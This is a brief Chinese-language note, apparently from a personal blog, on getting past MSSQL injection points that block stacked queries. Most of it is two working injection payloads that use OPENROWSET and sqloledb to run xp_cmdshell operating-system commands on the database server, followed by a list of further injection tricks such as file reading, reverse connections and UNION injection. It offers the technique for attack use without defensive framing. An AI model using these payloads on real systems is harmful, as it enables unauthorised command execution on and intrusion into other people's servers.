MSSQL注入不能多句执行时的突破方法

SQL执行
  select * from openrowset(‘sqloledb’,’dsn=locaserver;trusted_connection=yes’,’set fmtonly off exec master..xp_cmdshell ”dir c:”’)
  and 0<>(select * from openrowset(‘sqloledb’,’dsn=locaserver;trusted_connection=yes’,’set fmtonly off exec master..xp_cmdshell ”dir c:”’))
以此记录,精通脚本攻击技术这本书里还提到了mssql各种注入技巧。如注入点读文件,读mdb,读txt,反向连接测试,等。全文搜索绕开%,爆出各种信息,以及mssql的union语句注入